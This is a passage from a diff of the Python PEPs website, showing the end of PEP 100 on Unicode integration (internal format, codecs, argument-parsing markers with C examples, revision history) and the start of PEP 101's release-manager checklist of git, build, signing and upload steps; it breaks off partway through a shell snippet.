The methods .capitalize() and .iscapitalized() should follow the +case mapping algorithm defined in the above technical report as +closely as possible.

+
+
+

Line Breaks

+

Line breaking should be done for all Unicode characters having the +B property as well as the combinations CRLF, CR, LF (interpreted +in that order) and other special line separators defined by the +standard.

+

The Unicode type should provide a .splitlines() method which +returns a list of lines according to the above specification. See +Unicode Methods.
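A small sketch of the behaviour as it exists today (Python 3 spells the flag keepends rather than include_breaks):

text = "one\u2028two\r\nthree\rfour"
print(text.splitlines())       # ['one', 'two', 'three', 'four']
print(text.splitlines(True))   # line breaks included in each entry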

+
+
+

Unicode Character Properties

+

A separate module “unicodedata” should provide a compact interface +to all Unicode character properties defined in the standard’s +UnicodeData.txt file.

+

Among other things, these properties provide ways to recognize +numbers, digits, spaces, whitespace, etc.
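The module did land in the standard library; a small taste of the property access it provides:

import unicodedata

print(unicodedata.name("\u00e9"))      # LATIN SMALL LETTER E WITH ACUTE
print(unicodedata.category("A"))       # 'Lu' (letter, uppercase)
print(unicodedata.numeric("\u00bd"))   # 0.5 (VULGAR FRACTION ONE HALF)
print(unicodedata.decimal("7"))        # 7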

+

Since this module will have to provide access to all Unicode +characters, it will eventually have to contain the data from +UnicodeData.txt which takes up around 600kB. For this reason, the +data should be stored in static C data. This enables compilation +as a shared module which the underlying OS can share between +processes (unlike normal Python code modules).

+

There should be a standard Python interface for accessing this +information so that other implementors can plug in their own +possibly enhanced versions, e.g. ones that do decompressing of the +data on-the-fly.

+
+
+

Private Code Point Areas

+

Support for these is left to user land Codecs and not explicitly +integrated into the core. Note that due to the Internal Format +being implemented, only the area between \uE000 and \uF8FF is +usable for private encodings.

+
+
+

Internal Format

+

The internal format for Unicode objects should use a Python +specific fixed format <PythonUnicode> implemented as ‘unsigned +short’ (or another unsigned numeric type having 16 bits). Byte +order is platform dependent.

+

This format will hold UTF-16 encodings of the corresponding +Unicode ordinals. The Python Unicode implementation will address +these values as if they were UCS-2 values. UCS-2 and UTF-16 are +the same for all currently defined Unicode character points. +UTF-16 without surrogates provides access to about 64k characters +and covers all characters in the Basic Multilingual Plane (BMP) of +Unicode.

+

It is the Codec’s responsibility to ensure that the data they pass +to the Unicode object constructor respects this assumption. The +constructor does not check the data for Unicode compliance or use +of surrogates.

+

Future implementations can extend the 32 bit restriction to the +full set of all UTF-16 addressable characters (around 1M +characters).

+

The Unicode API should provide interface routines from +<PythonUnicode> to the compiler’s wchar_t which can be 16 or 32 +bit depending on the compiler/libc/platform being used.

+

Unicode objects should have a pointer to a cached Python string +object <defenc> holding the object’s value using the <default +encoding>. This is needed for performance and internal parsing +(see Internal Argument Parsing) reasons. The buffer is filled +when the first conversion request to the <default encoding> is +issued on the object.

+

Interning is not needed (for now), since Python identifiers are +defined as being ASCII only.

+

codecs.BOM should return the byte order mark (BOM) for the format +used internally. The codecs module should provide the following +additional constants for convenience and reference (codecs.BOM +will either be BOM_BE or BOM_LE depending on the platform):

+
BOM_BE: '\376\377'
+  (corresponds to Unicode U+0000FEFF in UTF-16 on big endian
+   platforms == ZERO WIDTH NO-BREAK SPACE)
+
+BOM_LE: '\377\376'
+  (corresponds to Unicode U+0000FFFE in UTF-16 on little endian
+   platforms == defined as being an illegal Unicode character)
+
+BOM4_BE: '\000\000\376\377'
+  (corresponds to Unicode U+0000FEFF in UCS-4)
+
+BOM4_LE: '\377\376\000\000'
+  (corresponds to Unicode U+0000FFFE in UCS-4)
+
+
+

Note that Unicode sees big endian byte order as being “correct”. +The swapped order is taken to be an indicator for a “wrong” +format, hence the illegal character definition.
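These constants survive in today's codecs module (the BOM4_* names became BOM_UTF32_*); a quick check of the native-order behaviour:

import codecs, sys

print(codecs.BOM_BE)   # b'\xfe\xff'
print(codecs.BOM_LE)   # b'\xff\xfe'
assert codecs.BOM == (codecs.BOM_LE if sys.byteorder == "little"
                      else codecs.BOM_BE)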

+

The configure script should provide aid in deciding whether Python +can use the native wchar_t type or not (it has to be a 16-bit +unsigned type).

+
+
+

Buffer Interface

+

Implement the buffer interface using the <defenc> Python string +object as basis for bf_getcharbuf and the internal buffer for +bf_getreadbuf. If bf_getcharbuf is requested and the <defenc> +object does not yet exist, it is created first.

+

Note that as a special case, the parser marker “s#” will not return +raw Unicode UTF-16 data (which the bf_getreadbuf returns), but +instead tries to encode the Unicode object using the default +encoding and then returns a pointer to the resulting string object +(or raises an exception in case the conversion fails). This was +done in order to prevent accidentally writing binary data to an +output stream which the other end might not recognize.

+

This has the advantage of being able to write to output streams +(which typically use this interface) without additional +specification of the encoding to use.

+

If you need to access the read buffer interface of Unicode +objects, use the PyObject_AsReadBuffer() interface.

+

The internal format can also be accessed using the +‘unicode-internal’ codec, e.g. via u.encode('unicode-internal').

+
+
+

Pickle/Marshalling

+

Should have native Unicode object support. The objects should be +encoded using platform independent encodings.

+

Marshal should use UTF-8 and Pickle should either choose +Raw-Unicode-Escape (in text mode) or UTF-8 (in binary mode) as +encoding. Using UTF-8 instead of UTF-16 has the advantage of +eliminating the need to store a BOM.

+
+
+

Regular Expressions

+

Secret Labs AB is working on a Unicode-aware regular expression +machinery. It works on plain 8-bit, UCS-2, and (optionally) UCS-4 +internal character buffers.

+

Also see

+
+
+

for some remarks on how to treat Unicode REs.

+
+
+

Formatting Markers

+

Format markers are used in Python format strings. If Python +strings are used as format strings, the following interpretations +should be in effect:

+
'%s': For Unicode objects this will cause coercion of the
+      whole format string to Unicode.  Note that you should use
+      a Unicode format string to start with for performance
+      reasons.
+
+
+

In case the format string is a Unicode object, all parameters are +coerced to Unicode first and then put together and formatted +according to the format string. Numbers are first converted to +strings and then to Unicode.

+
'%s': Python strings are interpreted as Unicode
+      string using the <default encoding>.  Unicode objects are
+      taken as is.
+
+
+

All other string formatters should work accordingly.

+

Example:

+
u"%s %s" % (u"abc", "abc")  ==  u"abc abc"
+
+
+
+
+

Internal Argument Parsing

+

These markers are used by the PyArg_ParseTuple() APIs:

+
+
“U”
Check for Unicode object and return a pointer to it
+
“s”
For Unicode objects: return a pointer to the object’s +<defenc> buffer (which uses the <default encoding>).
+
“s#”
Access to the default encoded version of the Unicode object +(see Buffer Interface); note that the length relates to +the length of the default encoded string rather than the +Unicode object length.
+
“t#”
Same as “s#”.
+
“es”
Takes two parameters: encoding (const char *) and buffer +(char **).

The input object is first coerced to Unicode in the usual +way and then encoded into a string using the given +encoding.

+

On output, a buffer of the needed size is allocated and +returned through *buffer as a NULL-terminated string. The +encoded string may not contain embedded NULL characters. The +caller is responsible for calling PyMem_Free() to free the +allocated *buffer after usage.

+
+
“es#”
Takes three parameters: encoding (const char *), buffer +(char **) and buffer_len (int *).

The input object is first coerced to Unicode in the usual +way and then encoded into a string using the given +encoding.

+

If *buffer is non-NULL, *buffer_len must be set to +sizeof(buffer) on input. Output is then copied to *buffer.

+

If *buffer is NULL, a buffer of the needed size is +allocated and output copied into it. *buffer is then +updated to point to the allocated memory area. The caller +is responsible for calling PyMem_Free() to free the +allocated *buffer after usage.

+

In both cases *buffer_len is updated to the number of +characters written (excluding the trailing NULL-byte). +The output buffer is assured to be NULL-terminated.

+
+
+

Examples:

+

Using “es#” with auto-allocation:

+
static PyObject *
+test_parser(PyObject *self,
+            PyObject *args)
+{
+    PyObject *str;
+    const char *encoding = "latin-1";
+    char *buffer = NULL;
+    int buffer_len = 0;
+
+    if (!PyArg_ParseTuple(args, "es#:test_parser",
+                          encoding, &buffer, &buffer_len))
+        return NULL;
+    if (!buffer) {
+        PyErr_SetString(PyExc_SystemError,
+                        "buffer is NULL");
+        return NULL;
+    }
+    str = PyString_FromStringAndSize(buffer, buffer_len);
+    PyMem_Free(buffer);
+    return str;
+}
+
+
+

Using “es” with auto-allocation returning a NULL-terminated string:

+
static PyObject *
+test_parser(PyObject *self,
+            PyObject *args)
+{
+    PyObject *str;
+    const char *encoding = "latin-1";
+    char *buffer = NULL;
+
+    if (!PyArg_ParseTuple(args, "es:test_parser",
+                          encoding, &buffer))
+        return NULL;
+    if (!buffer) {
+        PyErr_SetString(PyExc_SystemError,
+                        "buffer is NULL");
+        return NULL;
+    }
+    str = PyString_FromString(buffer);
+    PyMem_Free(buffer);
+    return str;
+}
+
+
+

Using “es#” with a pre-allocated buffer:

+
static PyObject *
+test_parser(PyObject *self,
+            PyObject *args)
+{
+    PyObject *str;
+    const char *encoding = "latin-1";
+    char _buffer[10];
+    char *buffer = _buffer;
+    int buffer_len = sizeof(_buffer);
+
+    if (!PyArg_ParseTuple(args, "es#:test_parser",
+                          encoding, &buffer, &buffer_len))
+        return NULL;
+    if (!buffer) {
+        PyErr_SetString(PyExc_SystemError,
+                        "buffer is NULL");
+        return NULL;
+    }
+    str = PyString_FromStringAndSize(buffer, buffer_len);
+    return str;
+}
+
+
+
+
+

File/Stream Output

+

Since file.write(object) and most other stream writers use the +“s#” or “t#” argument parsing marker for querying the data to +write, the default encoded string version of the Unicode object +will be written to the streams (see Buffer Interface).

+

For explicit handling of files using Unicode, the standard stream +codecs as available through the codecs module should be used.

+

The codecs module should provide a short-cut +open(filename,mode,encoding) which also assures that +mode contains the ‘b’ character when needed.
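codecs.open() was indeed added and still exists (the built-in open() with an encoding argument has since superseded it for most uses); a short sketch, writing a hypothetical demo.txt:

import codecs

# codecs.open() always opens the underlying file in binary mode,
# which is the "assures that mode contains 'b'" behaviour above.
with codecs.open("demo.txt", "w", encoding="utf-8") as f:
    f.write("h\xe9llo\n")

with codecs.open("demo.txt", encoding="utf-8") as f:
    print(f.read())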

+
+
+

File/Stream Input

+

Only the user knows what encoding the input data uses, so no +special magic is applied. The user will have to explicitly +convert the string data to Unicode objects as needed or use the +file wrappers defined in the codecs module (see File/Stream +Output).

+
+
+

Unicode Methods & Attributes

+

All Python string methods, plus:

+
.encode([encoding=<default encoding>][,errors="strict"])
+   --> see Unicode Output
+
+.splitlines([include_breaks=0])
+   --> breaks the Unicode string into a list of (Unicode) lines;
+       returns the lines with line breaks included, if
+       include_breaks is true.  See Line Breaks for a
+       specification of how line breaking is done.
+
+
+
+
+

Code Base

+

We should use Fredrik Lundh’s Unicode object implementation as +basis. It already implements most of the string methods needed +and provides a well written code base which we can build upon.

+

The object sharing implemented in Fredrik’s implementation should +be dropped.

+
+
+

Test Cases

+

Test cases should follow those in Lib/test/test_string.py and +include additional checks for the Codec Registry and the Standard +Codecs.

+
+
+

References

+ +
+
+

History of this Proposal

+

[ed. note: revisions prior to 1.7 are available in the CVS history +of Misc/unicode.txt from the standard Python distribution. All +subsequent history is available via the CVS revisions on this +file.]

+
+

1.7

+
    +
  • Added note about the changed behaviour of “s#”.
  • +
+
+
+

1.6

+
    +
  • Changed <defencstr> to <defenc> since this is the name used in the +implementation.
  • +
  • Added notes about the usage of <defenc> in +the buffer protocol implementation.
  • +
+
+
+

1.5

+
    +
  • Added notes about setting the <default encoding>.
  • +
  • Fixed some typos (thanks to Andrew Kuchling).
  • +
  • Changed <defencstr> to <utf8str>.
  • +
+
+
+

1.4

+
    +
  • Added note about mixed type comparisons and contains tests.
  • +
  • Changed treating of Unicode objects in format strings (if +used with '%s' % u they will now cause the format string to +be coerced to Unicode, thus producing a Unicode object on +return).
  • +
  • Added link to IANA charset names (thanks to Lars +Marius Garshol).
  • +
  • Added new codec methods .readline(), +.readlines() and .writelines().
  • +
+
+
+

1.3

+
    +
  • Added new “es” and “es#” parser markers
  • +
+
+
+

1.2

+
    +
  • Removed POD about codecs.open()
  • +
+
+
+

1.1

+
    +
  • Added note about comparisons and hash values.
  • +
  • Added note about case mapping algorithms.
  • +
  • Changed stream codecs .read() and .write() method +to match the standard file-like object +methods (bytes consumed information is no longer returned by +the methods)
  • +
+
+
+

1.0

+
    +
  • changed encode Codec method to be symmetric to the decode method +(they both return (object, data consumed) now and thus become +interchangeable);
  • +
  • removed __init__ method of Codec class (the +methods are stateless) and moved the errors argument down to +the methods;
  • +
  • made the Codec design more generic w/r to type +of input and output objects;
  • +
  • changed StreamWriter.flush to StreamWriter.reset in order to +avoid overriding the stream’s .flush() method;
  • +
  • renamed .breaklines() to .splitlines();
  • +
  • renamed the module unicodec to codecs;
  • +
  • modified the File I/O section to refer to the stream codecs.
  • +
+
+
+

0.9

+
    +
  • changed errors keyword argument definition;
  • +
  • added ‘replace’ error handling;
  • +
  • changed the codec APIs to accept buffer like +objects on input;
  • +
  • some minor typo fixes;
  • +
  • added Whitespace section and included references for Unicode characters that +have the whitespace and the line break characteristic;
  • +
  • added note that search functions can expect lower-case encoding names;
  • +
  • dropped slicing and offsets in the codec APIs
  • +
+
+
+

0.8

+
    +
  • added encodings package and raw unicode escape encoding;
  • +
  • untabified the proposal;
  • +
  • added notes on Unicode format strings;
  • +
  • added .breaklines() method
  • +
+
+
+

0.7

+
    +
  • added a whole new set of codec APIs;
  • +
  • added a different encoder lookup scheme;
  • +
  • fixed some names
  • +
+
+
+

0.6

+
    +
  • changed “s#” to “t#”;
  • +
  • changed <defencbuf> to <defencstr> holding +a real Python string object;
  • +
  • changed Buffer Interface to +delegate requests to <defencstr>’s buffer interface;
  • +
  • removed the explicit reference to the unicodec.codecs dictionary (the +module can implement this in way fit for the purpose);
  • +
  • removed the settable default encoding;
  • +
  • move UnicodeError from unicodec to exceptions;
  • +
“s#” now returns the internal data;
  • +
  • passed the UCS-2/UTF-16 checking from the Unicode constructor +to the Codecs
  • +
+
+
+

0.5

+
    +
  • moved sys.bom to unicodec.BOM;
  • +
  • added sections on case mapping,
  • +
  • private use encodings and Unicode character properties
  • +
+
+
+

0.4

+
    +
  • added Codec interface, notes on %-formatting,
  • +
  • changed some encoding details,
  • +
  • added comments on stream wrappers,
  • +
  • fixed some discussion points (most important: Internal Format),
  • +
  • clarified the ‘unicode-escape’ encoding, added encoding +references
  • +
+
+
+

0.3

+
    +
  • added references, comments on codec modules, the internal format, +bf_getcharbuffer and the RE engine;
  • +
  • added ‘unicode-escape’ +encoding proposed by Tim Peters and fixed repr(u) accordingly
  • +
+
+
+

0.2

+
    +
  • integrated Guido’s suggestions, added stream codecs and file wrapping
  • +
+
+
+

0.1

+
    +
  • first version
  • +
+
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0100.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0101/index.html b/pep-0101/index.html new file mode 100644 index 00000000000..e07c7218f9e --- /dev/null +++ b/pep-0101/index.html @@ -0,0 +1,908 @@ + + + + + + + + PEP 101 – Doing Python Releases 101 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 101 – Doing Python Releases 101

+
+
Author:
+
Barry Warsaw <barry at python.org>, Guido van Rossum <guido at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
22-Aug-2001
+
Post-History:
+

+
Replaces:
+
102
+
+
+
+
Table of Contents +
+
+

Abstract

+

Making a Python release is a thrilling and crazy process. You’ve heard +the expression “herding cats”? Imagine trying to also saddle those +purring little creatures up, and ride them into town, with some of their +buddies firmly attached to your bare back, anchored by newly sharpened +claws. At least they’re cute, you remind yourself.

+

Actually, no, that’s a slight exaggeration 😉 The Python release +process has steadily improved over the years and now, with the help of our +amazing community, is really not too difficult. This PEP attempts to +collect, in one place, all the steps needed to make a Python release. +Most of the steps are now automated or guided by automation, so manually +following this list is no longer necessary.

+
+
+

Things You’ll Need

+

As a release manager there are a lot of resources you’ll need to access. +Here’s a hopefully-complete list.

+
    +
  • A GPG key.

    Python releases before 3.14 are digitally signed with GPG; for these you’ll +need a key, which hopefully will be on the “web of trust” with at least one of +the other release managers.

    +
    +

    Note

    +

    GPG instructions in this PEP can be ignored for Python 3.14 and +later. See PEP 761 for details.

    +
    +
  • +
  • A bunch of software:
      +
    • A checkout of the python/release-tools repo. +It contains a requirements.txt +file that you need to install +dependencies from first. Afterwards, you can fire up scripts in the +repo, covered later in this PEP.
    • +
    • blurb, the +Misc/NEWS +management tool. You can pip install it.
    • +
    +
  • +
  • Access to servers where you will upload files:
      +
    • downloads.nyc1.psf.io, the server that hosts download files; and
    • +
    • docs.nyc1.psf.io, the server that hosts the documentation.
    • +
    +
  • +
  • Administrator access to python/cpython.
  • +
  • An administrator account on www.python.org, including an “API key”.
  • +
  • Write access to the python/peps repository.

    If you’re reading this, you probably already have this–the first +task of any release manager is to draft the release schedule. But +in case you just signed up… sucker! I mean, uh, congratulations!

    +
  • +
  • Posting access to blog.python.org, a Blogger-hosted weblog. +The RSS feed from this blog is used for the ‘Python News’ section +on www.python.org.
  • +
  • A subscription to the super secret release manager mailing list, which may +or may not be called python-cabal. Bug Barry about this.
  • +
  • A @python.org email address that you will use to sign your releases +with. Ask postmaster@ for an address; you can either get a full +account, or a redirecting alias + SMTP credentials to send email from +this address that looks legit to major email providers.
  • +
  • Be added to the Python Security Response Team.
  • +
+
+
+

Types of Releases

+

There are several types of releases you will need to make. These include:

+
    +
  • alpha
  • +
  • begin beta, also known as beta 1, also known as new branch
  • +
  • beta 2+
  • +
  • release candidate 1
  • +
  • release candidate 2+
  • +
  • final
  • +
  • new branch
  • +
  • begin bugfix mode
  • +
  • begin security-only mode
  • +
  • end-of-life
  • +
+

Some of these release types actually involve more than +one release branch. In particular, a new branch is that point in the +release cycle when a new feature release cycle begins. Under the current +organization of the CPython Git repository, the main branch is always +the target for new features. At some point in the release cycle of the +next feature release, a new branch release is made which creates a +new separate branch for stabilization and later maintenance of the +current in-progress feature release (3.n.0) and the main branch is modified +to build a new version (which will eventually be released as 3.n+1.0). +While the new branch release step could occur at one of several points +in the release cycle, current practice is for it to occur at feature code +cutoff for the release which is scheduled for the first beta release.

+

In the descriptions that follow, steps specific to release types are +labeled accordingly, for now, new branch and final.

+
+
+

How To Make A Release

+

Here are the steps taken to make a Python release. Some steps are more +fuzzy than others because there’s little that can be automated (e.g. +writing the NEWS entries). Where a step is usually performed by An +Expert, the role of that expert is given. Otherwise, assume the step is +done by the Release Manager (RM), the designated person performing the +release. The roles and their current experts are:

+ +
+

Note

+

It is highly recommended that the RM contact the Experts the day +before the release. Because the world is round and everyone lives +in different timezones, the RM must ensure that the release tag is +created in enough time for the Experts to cut binary releases.

+

You should not make the release public (by updating the website and +sending announcements) before all experts have updated their bits. +In rare cases where the expert for Windows or Mac is MIA, you may add +a message “(Platform) binaries will be provided shortly” and proceed.

+
+

As much as possible, the release steps are automated and guided by the +release script, which is available in a separate repository: +python/release-tools.

+

We use the following conventions in the examples below. Where a release +number is given, it is of the form 3.X.YaN, e.g. 3.13.0a3 for Python 3.13.0 +alpha 3, where “a” == alpha, “b” == beta, “rc” == release candidate.

+

Release tags are named v3.X.YaN. The branch name for minor release +maintenance branches is 3.X.
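For illustration, a hypothetical helper (not part of the actual release tooling) that captures this naming convention:

import re

# Matches release tags such as v3.13.0a3, v3.4.3rc1 and final v3.4.3.
TAG_RE = re.compile(r"^v3\.(\d+)\.(\d+)(?:(a|b|rc)(\d+))?$")

for tag in ("v3.13.0a3", "v3.4.3rc1", "v3.4.3"):
    assert TAG_RE.match(tag), tag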

+

This helps by performing several automatic editing steps, and guides you +to perform some manual editing steps.

+
    +
  • Log into Discord and join the Python Core Devs server. Ask Thomas +or Łukasz for an invite.

    You probably need to coordinate with other people around the world. +This communication channel is where we’ve arranged to meet.

    +
  • +
  • Check to see if there are any showstopper bugs.

    Go to https://github.com/python/cpython/issues and look for any open +bugs that can block this release. You’re looking at two relevant labels:

    +
    +
    release-blocker
    Stops the release dead in its tracks. You may not +make any release with any open release blocker bugs.
    +
    deferred-blocker
    Doesn’t block this release, but it will block a +future release. You may not make a final or +candidate release with any open deferred blocker +bugs.
    +
    +

    Review the release blockers and either resolve them, bump them down to +deferred, or stop the release and ask for community assistance. If +you’re making a final or candidate release, do the same with any open +deferred.

    +
  • +
  • Check the stable buildbots.

    Go to https://buildbot.python.org/all/#/release_status

    +

    Look at the buildbots for the release +you’re making. Ignore any that are offline (or inform the community so +they can be restarted). If what remains are (mostly) green buildbots, +you’re good to go. If you have non-offline red buildbots, you may want +to hold up the release until they are fixed. Review the problems and +use your judgement, taking into account whether you are making an alpha, +beta, or final release.

    +
  • +
  • Make a release clone.

    On a fork of the CPython repository on GitHub, create a release branch +within it (called the “release clone” from now on). You can use the same +GitHub fork you use for CPython development. Using the standard setup +recommended in the Python Developer’s Guide, +your fork would be referred +to as origin and the standard CPython repo as upstream. You will +use the branch on your fork to do the release engineering work, including +tagging the release, and you will use it to share with the other experts +for making the binaries.

    +

    For a final or release candidate 2+ release, if you are going +to cherry-pick a subset of changes for the next rc or final from all those +merged since the last rc, you should create a release +engineering branch starting from the most recent release candidate tag, +i.e. v3.8.0rc1. You will then cherry-pick changes from the standard +release branch as necessary into the release engineering branch and +then proceed as usual. If you are going to take all of the changes +since the previous rc, you can proceed as normal.

    +
  • +
  • Make sure the current branch of your release clone is the branch you +want to release from (git status).
  • +
  • Run blurb release <version> specifying the version number +(e.g. blurb release 3.4.7rc1). This merges all the recent news +blurbs into a single file marked with this release’s version number.
  • +
Regenerate Lib/pydoc_data/topics.py.

    While still in the Doc directory, run:

    +
    make pydoc-topics
    +cp build/pydoc-topics/topics.py ../Lib/pydoc_data/topics.py
    +
    +
    +
  • +
Commit your changes to Lib/pydoc_data/topics.py +(and any fixes you made in the docs).
  • +
Consider running autoconf using the currently accepted standard version +in case configure or other Autoconf-generated files were last +committed with a newer or older version and may contain spurious or +harmful differences. Currently, Autoconf 2.71 is our de facto standard. +If there are differences, commit them.
  • +
  • Make sure the SOURCE_URI in Doc/tools/extensions/pyspecific.py +points to the right branch in the Git repository (main or 3.X). +For a new branch release, change the branch in the file from main +to the new release branch you are about to create (3.X).
  • +
  • Bump version numbers via the release script:
    .../release-tools/release.py --bump 3.X.YaN
    +
    +
    +

Reminder: X, Y, and N should be integers. +A should be one of a, b, or rc (e.g. 3.4.3rc1). +For final releases omit the aN (3.4.3). For the first +release of a new version Y should be 0 (3.6.0).

    +

    This automates updating various release numbers, but you will have to +modify a few files manually. If your $EDITOR environment variable is +set up correctly, release.py will pop up editor windows with the files +you need to edit.

    +

    Review the blurb-generated Misc/NEWS file and edit as necessary.

    +
  • +
  • Make sure all changes have been committed. (release.py --bump +doesn’t check in its changes for you.)
  • +
  • For a final major release, edit the first paragraph of +Doc/whatsnew/3.X.rst to include the actual release date; e.g. “Python +2.5 was released on August 1, 2003.” There’s no need to edit this for +alpha or beta releases.
  • +
  • Do a git status in this directory.

    You should not see any files, i.e., you better not have any uncommitted +changes in your working directory.

    +
  • +
  • Tag the release for 3.X.YaN:
    .../release-tools/release.py --tag 3.X.YaN
    +
    +
    +

    This executes a git tag command with the -s option so that the +release tag in the repo is signed with your GPG key. When prompted +choose the private key you use for signing release tarballs etc.

    +
  • +
  • For begin security-only mode and end-of-life releases, review the +two files and update the versions accordingly in all active branches.
  • +
  • Time to build the source tarball. Use the release script to create +the source gzip and xz tarballs, +documentation tar and zip files, and GPG signature files:
    .../release-tools/release.py --export 3.X.YaN
    +
    +
    +

    This can take a while for final releases, and it will leave all the +tarballs and signatures in a subdirectory called 3.X.YaN/src, and the +built docs in 3.X.YaN/docs (for final releases).

    +

    Note that the script will sign your release with Sigstore. Use +your @python.org email address for this. See here for more information: +https://www.python.org/download/sigstore/.

    +
  • +
  • Now you want to perform the very important step of checking the +tarball you just created, to make sure a completely clean, +virgin build passes the regression test. Here are the best +steps to take:
    cd /tmp
    +tar xvf /path/to/your/release/clone/<version>//Python-3.2rc2.tgz
    +cd Python-3.2rc2
    +ls
    +# (Do things look reasonable?)
    +ls Lib
    +# (Are there stray .pyc files?)
    +./configure
    +# (Loads of configure output)
    +make test
    +# (Do all the expected tests pass?)
    +
    +
    +

    If you’re feeling lucky and have some time to kill, or if you are making +a release candidate or final release, run the full test suite:

    +
    make buildbottest
    +
    +
    +

    If the tests pass, then you can feel good that the tarball is +fine. If some of the tests fail, or anything else about the +freshly unpacked directory looks weird, you better stop now and +figure out what the problem is.

    +
  • +
  • Push your commits to the remote release branch in your GitHub fork:
    # Do a dry run first.
    +git push --dry-run --tags origin
    +# Make sure you are pushing to your GitHub fork,
    +# *not* to the main python/cpython repo!
    +git push --tags origin
    +
    +
    +
  • +
  • Notify the experts that they can start building binaries.
  • +
+
+

Warning

+

STOP: at this point you must receive the “green light” from other experts +in order to create the release. There are things you can do while you wait +though, so keep reading until you hit the next STOP.

+
+
    +
  • The WE generates and publishes the Windows files using the Azure +Pipelines build scripts in .azure-pipelines/windows-release/, +currently set up at https://dev.azure.com/Python/cpython/_build?definitionId=21.

    The build process runs in multiple stages, with each stage’s output being +available as a downloadable artifact. The stages are:

    +
      +
    • Compile all variants of binaries (32-bit, 64-bit, debug/release), +including running profile-guided optimization.
    • +
    • Compile the HTML Help file containing the Python documentation.
    • +
    • Codesign all the binaries with the PSF’s certificate.
    • +
    • Create packages for python.org, nuget.org, the embeddable distro and +the Windows Store.
    • +
    • Perform basic verification of the installers.
    • +
    • Upload packages to python.org and nuget.org, purge download caches and +run a test download.
    • +
    +

    After the uploads are complete, the WE copies the generated hashes from +the build logs and emails them to the RM. The Windows Store packages are +uploaded manually to https://partner.microsoft.com/dashboard/home by the +WE.

    +
  • +
  • The ME builds Mac installer packages and uploads them to +downloads.nyc1.psf.io together with GPG signature files.
  • +
  • scp or rsync all the files built by release.py --export +to your home directory on downloads.nyc1.psf.io.

    While you’re waiting for the files to finish uploading, you can continue +on with the remaining tasks. You can also ask folks on Discord +and/or discuss.python.org to download the files as they finish uploading +so that they can test them on their platforms as well.

    +
  • +
  • Now you need to go to downloads.nyc1.psf.io and move all the files in place +over there. Our policy is that every Python version gets its own +directory, but each directory contains all releases of that version.
      +
    • On downloads.nyc1.psf.io, cd /srv/www.python.org/ftp/python/3.X.Y +creating it if necessary. Make sure it is owned by group downloads +and group-writable.
    • +
    • Move the release .tgz, and .tar.xz files into place, as well as the +.asc GPG signature files. The Win/Mac binaries are usually put there +by the experts themselves.

      Make sure they are world readable. They should also be group +writable, and group-owned by downloads.

      +
    • +
    • Use gpg --verify to make sure they got uploaded intact.
    • +
    • If this is a final or rc release: Move the doc zips and tarballs to +/srv/www.python.org/ftp/python/doc/3.X.Y[rcA], creating the directory +if necessary, and adapt the “current” symlink in .../doc to point to +that directory. Note though that if you’re releasing a maintenance +release for an older version, don’t change the current link.
    • +
    • If this is a final or rc release (even a maintenance release), also +unpack the HTML docs to /srv/docs.python.org/release/3.X.Y[rcA] on +docs.nyc1.psf.io. Make sure the files are in group docs and are +group-writeable.
    • +
    • Let the DE check if the docs are built and work all right.
    • +
    • Note both the documentation and downloads are behind a caching CDN. If +you change archives after downloading them through the website, you’ll +need to purge the stale data in the CDN like this:
      curl -X PURGE https://www.python.org/ftp/python/3.12.0/Python-3.12.0.tar.xz
      +
      +
      +

      You should always purge the cache of the directory listing as people +use that to browse the release files:

      +
      curl -X PURGE https://www.python.org/ftp/python/3.12.0/
      +
      +
      +
    • +
    +
  • +
  • For the extra paranoid, do a completely clean test of the release. +This includes downloading the tarball from www.python.org.

    Make sure the md5 checksums match. Then unpack the tarball, +and do a clean make test:

    +
    make distclean
    +./configure
    +make test
    +
    +
    +

    To ensure that the regression test suite passes. If not, you +screwed up somewhere!

    +
  • +
+
+

Warning

+

STOP and confirm:

+
    +
  • Have you gotten the green light from the WE?
  • +
  • Have you gotten the green light from the ME?
  • +
  • Have you gotten the green light from the DE?
  • +
+
+

If green, it’s time to merge the release engineering branch back into +the main repo.

+
    +
  • In order to push your changes to GitHub, you’ll have to temporarily +disable branch protection for administrators. Go to the +Settings | Branches page:

    https://github.com/python/cpython/settings/branches

    +

    “Edit” the settings for the branch you’re releasing on. +This will load the settings page for that branch. +Uncheck the “Include administrators” box and press the +“Save changes” button at the bottom.

    +
  • +
  • Merge your release clone into the main development repo:
    # Pristine copy of the upstream repo branch
    +git clone git@github.com:python/cpython.git merge
    +cd merge
    +
    +# Checkout the correct branch:
    +# 1. For feature pre-releases up to and including a
    +#    **new branch** release, i.e. alphas and first beta
    +#   do a checkout of the main branch
    +git checkout main
    +
    +# 2. Else, for all other releases, checkout the
    +#       appropriate release branch.
    +git checkout 3.X
    +
    +# Fetch the newly created and signed tag from your clone repo
    +git fetch --tags git@github.com:your-github-id/cpython.git v3.X.YaN
    +# Merge the temporary release engineering branch back into
    +git merge --no-squash v3.X.YaN
    +git commit -m 'Merge release engineering branch'
    +
    +
    +
  • +
  • If this is a new branch release, i.e. first beta, +now create the new release branch:
    git checkout -b 3.X
    +
    +
    +

    Do any steps needed to setup the new release branch, including:

    +
      +
    • In README.rst, change all references from main to +the new branch, in particular, GitHub repo URLs.
    • +
    +
  • +
  • For all releases, do the guided post-release steps with the +release script:
    .../release-tools/release.py --done 3.X.YaN
    +
    +
    +
  • +
  • For a final or release candidate 2+ release, you may need to do some post-merge cleanup. Check the top-level README.rst and Include/patchlevel.h files to ensure they now reflect the desired post-release values for on-going development. The patchlevel should be the release tag with a +. Also, if you cherry-picked changes from the standard release branch into the release engineering branch for this release, you will now need to manually remove each blurb entry from the Misc/NEWS.d/next directory that was cherry-picked into the release you are working on, since that blurb entry is now captured in the merged x.y.z.rst file for the new release. Otherwise, the blurb entry will appear twice in the changelog.html file, once under Python next and again under x.y.z.
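    A hedged sketch of how the cherry-picked blurb entries could be spotted; it assumes blurb file names embed the issue number as gh-issue-NNN and that the merged x.y.z.rst mentions the same number (verify blurb’s actual output format before relying on this):

    for f in Misc/NEWS.d/next/*/*.rst; do
        num=$(basename "$f" | sed -n 's/.*gh-issue-\([0-9]*\).*/\1/p')
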